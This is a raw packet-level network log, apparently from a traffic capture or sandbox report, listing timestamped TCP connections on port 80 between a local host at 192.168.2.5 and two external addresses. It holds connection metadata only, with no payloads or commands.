Sep 27, 2024 04:21:17.919275045 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.919275045 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.919282913 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.919292927 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.919302940 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.919312000 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.919312000 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.919440031 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.919738054 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.919749022 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.919759035 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.919786930 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.919786930 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.919821024 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.919831038 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.919841051 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.919852972 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.919863939 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.919867039 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.919867039 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.919886112 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.920404911 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.920416117 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.920425892 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.920444012 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.920444012 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.920474052 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.920483112 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.920491934 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.920502901 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.920514107 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.920525074 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.920536995 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.920536995 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.920589924 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.920595884 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.920600891 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.920644999 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.920656919 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.920684099 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.920684099 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.920691967 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.920732021 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.920747995 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.920758963 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.920768976 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.920778990 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.920798063 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.920798063 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.921003103 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.921077967 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.921087027 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.921097040 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.921108007 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.921118021 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.921128035 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.921138048 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.921144962 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.921145916 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.921149969 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.921180010 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.921180010 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.921297073 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.921308041 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.921318054 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.921329021 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.921339989 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.921348095 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.921348095 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.921356916 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.921367884 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.921377897 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.921395063 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.921395063 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.924237967 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.946711063 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.946737051 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.946754932 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.946765900 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.946775913 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.946796894 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.946798086 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.946819067 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.946832895 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.946842909 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.946865082 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.946865082 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.947236061 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.949440956 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.949476957 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.949496031 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.949508905 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.949529886 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.949537992 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.949537992 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.949542046 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.949556112 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.949573040 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.949651003 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.949835062 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.949847937 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.949858904 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.949871063 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.949887037 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.949894905 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.949894905 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.949934006 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.949934006 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.949973106 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.949986935 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.949996948 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.950017929 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.950017929 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.950037956 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.950103998 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.950115919 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.950139999 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.950139999 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.950171947 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.950184107 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.950215101 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.950215101 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.950242043 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.950253963 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.950268030 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.950300932 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.950300932 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.958694935 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.958745003 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.958755016 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.958775997 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.958786964 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.958796978 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.958798885 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.958810091 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.958822012 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.958834887 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.958842039 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.958857059 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.958874941 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.958918095 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.958928108 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.958939075 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.958962917 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.958980083 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.958985090 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.958992004 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959002972 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959008932 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.959012985 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959026098 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.959041119 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.959083080 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959095001 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959106922 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959117889 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959130049 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.959155083 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.959166050 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959178925 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959189892 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959197998 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.959208012 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959218979 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959222078 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.959229946 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959244013 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.959266901 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.959321022 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959332943 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959345102 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959356070 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.959356070 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959371090 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959378958 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.959399939 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.959420919 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959433079 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959445953 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959453106 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.959465027 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959475994 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959477901 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.959498882 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.959522009 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.959526062 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959538937 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959547997 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959567070 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.959588051 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.959727049 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959774017 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959791899 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959815979 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.959821939 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959834099 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959839106 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.959861040 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.959868908 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959882021 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959903955 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.959923983 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.959933996 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959943056 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959956884 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959961891 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.959969044 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959980965 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.959989071 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.959989071 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.960000038 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.960004091 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.960012913 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.960021973 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.960026026 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.960031986 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.960042953 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.960047960 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.960053921 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.960072994 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.960084915 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.960098028 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.960114956 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.960114956 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.960129023 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.960139990 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.960143089 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.960156918 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.960161924 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.960169077 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.960176945 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.960192919 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.960208893 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.960268974 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.960280895 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.960292101 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.960303068 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.960314035 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.960314035 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.960335970 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.960350037 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.960437059 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.960448980 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.960469007 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.960481882 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.961870909 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.961884022 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.961895943 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.961920977 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.961936951 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.961941004 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.961949110 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.961961031 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.961978912 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.961985111 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.961985111 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.961999893 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.962014914 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.968096972 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.968152046 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.968163013 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.968226910 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.968239069 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.968251944 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.968262911 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.968276978 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.968276978 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.969223976 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.969384909 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.969403982 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.969413042 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.969445944 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.969474077 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.969485044 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.969496965 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.969508886 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.969508886 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.969527006 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.969543934 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.969564915 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.969564915 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.971755981 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.003645897 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.003743887 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.003755093 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.003773928 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.003781080 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.003781080 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.003786087 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.003798962 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.003813028 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.003860950 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.003916979 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.003916979 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.004818916 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.004831076 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.004842997 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.004889965 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.004898071 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.004909992 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.004923105 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.004924059 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.004934072 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.004946947 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.004960060 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.004987955 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.005067110 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005078077 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005089045 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005100965 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005111933 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005122900 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005130053 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.005130053 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.005136013 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005145073 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.005147934 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005158901 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005170107 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005171061 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.005192995 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.005223989 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.005244970 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005255938 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005266905 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005276918 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.005285978 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005295038 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.005296946 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005309105 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005319118 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.005320072 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.005331039 CEST	80	49722	185.215.113.17	192.168.2.5
